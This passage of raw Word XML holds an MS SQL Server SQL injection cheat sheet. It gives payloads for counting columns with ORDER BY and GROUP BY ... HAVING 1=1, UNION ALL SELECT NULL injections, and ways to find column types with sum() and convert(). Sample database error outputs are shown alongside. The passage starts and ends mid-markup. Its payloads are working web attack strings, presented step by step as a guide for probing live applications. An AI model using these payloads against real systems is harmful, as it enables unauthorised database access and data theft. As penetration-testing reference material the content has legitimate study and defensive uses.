      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table.columnfromerror1, columnfromerror2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> HAVING 1=1 --</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (triggers error 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C477642" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C909945" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 GROUP BY </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table.columnfromerror1, columnfromerror2, columnfromerror(n) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HAVING 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B6FE"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Once you are not getting any more errors, you are done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD20B0"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Finding the number of columns in a SELECT query using ORDER BY (MSO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DBE7CA"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lastRenderedPageBreak/>
        <w:t>Finding the number of columns using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> can speed up the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> SQL injection process. Try the following payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5800C7" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D22CEAC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F8A67" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D7D2B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ORDER BY N--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C795BD"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Keep going until you get an error, which means you have found the number of columns being selected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C85990"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Tips and tricks for error-based UNION injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20C45A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Always use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>because you can have similar non-distinct field types. By default, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> tries to get distinct records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A197EC6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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To get rid of unwanted records from the left-side table in a join, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> or any non-existent record search at the beginning of your query (only when injecting into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> clause). This can be necessary if you are only getting one result at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F212FC0" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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For most data types, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> injections instead of trying to guess if the column is a string, date, integer etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731869C"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In blind injection situations, make sure you always check if the error is coming from the database or from the application itself. Some languages (like ASP.NET) tend to generally throw errors when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> values (mostly because developers are not expecting to process </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in a field like username.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205C872"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Ways of finding the column type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7729E"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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sum()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> function to provoke errors from non-numeric types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424C988" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 UNION SELECT sum(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>columntofind</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) from </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </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Microsoft OLE DB Provider for ODBC Drivers error '80040e07' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> data type as an argument.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12540761"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If you are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> getting an error, it means the column is numeric.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABDBB6"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You can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cast()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in a similar way, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818AAA6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55577613" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>No error—the syntax is correct and MS SQL Server is used. Proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17599397" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>No error—we now know the first column is an integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627FD5C7" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D392FE6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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Microsoft OLE DB Provider for SQL Server error '80040e07' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Explicit conversion from data type </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to image is not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF6703" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>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Error! The second column is not an integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4FE3D5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
